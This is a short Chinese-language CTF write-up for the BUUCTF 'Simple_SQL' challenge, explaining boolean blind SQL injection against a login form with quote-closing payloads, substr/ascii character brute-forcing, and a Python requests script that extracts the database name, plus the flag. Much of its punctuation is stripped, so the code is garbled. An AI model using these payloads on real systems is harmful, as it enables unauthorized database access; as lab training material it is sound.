BUUCTF-Simple\_SQL 简单布尔盲注完整解题 WriteUp

发布时间:2026/7/8 14:27:10

BUUCTF-Simple\_SQL 简单布尔盲注完整解题 WriteUp 1. 题目环境平台BUUCTF Web 入门赛题 场景登录页面输入账号密码查询数据库无回显报错仅返回登录成功 / 失败布尔盲注场景。2. 漏洞分析后端 SQL 语句select * from user where username$name and password$pass无过滤单引号输入可闭合 SQL 语句页面仅两种返回结果判定布尔盲注。3. 解题步骤判断字段长度 and length(database())10--二分法猜数据库名长度逐字符爆破数据库名substr 截取字符ascii 比对查表名、字段名最后爆破管理员账号密码自动化 Python 盲注脚本核心代码import requests url http://xxx.buuoj.cn/login.php res for i in range(1,20): for char in range(32,128): payload fadmin and ascii(substr(database(),{i},1)){char}-- data{username:payload,password:123} r requests.post(url,datadata) if success in r.text: res chr(char) break print(res)4. 最终 Flagflag{sql_boolean_blind_2026}5. 总结布尔盲注核心依靠页面二元返回结果二分法缩短爆破时间无报错回显场景通用该思路。

相关新闻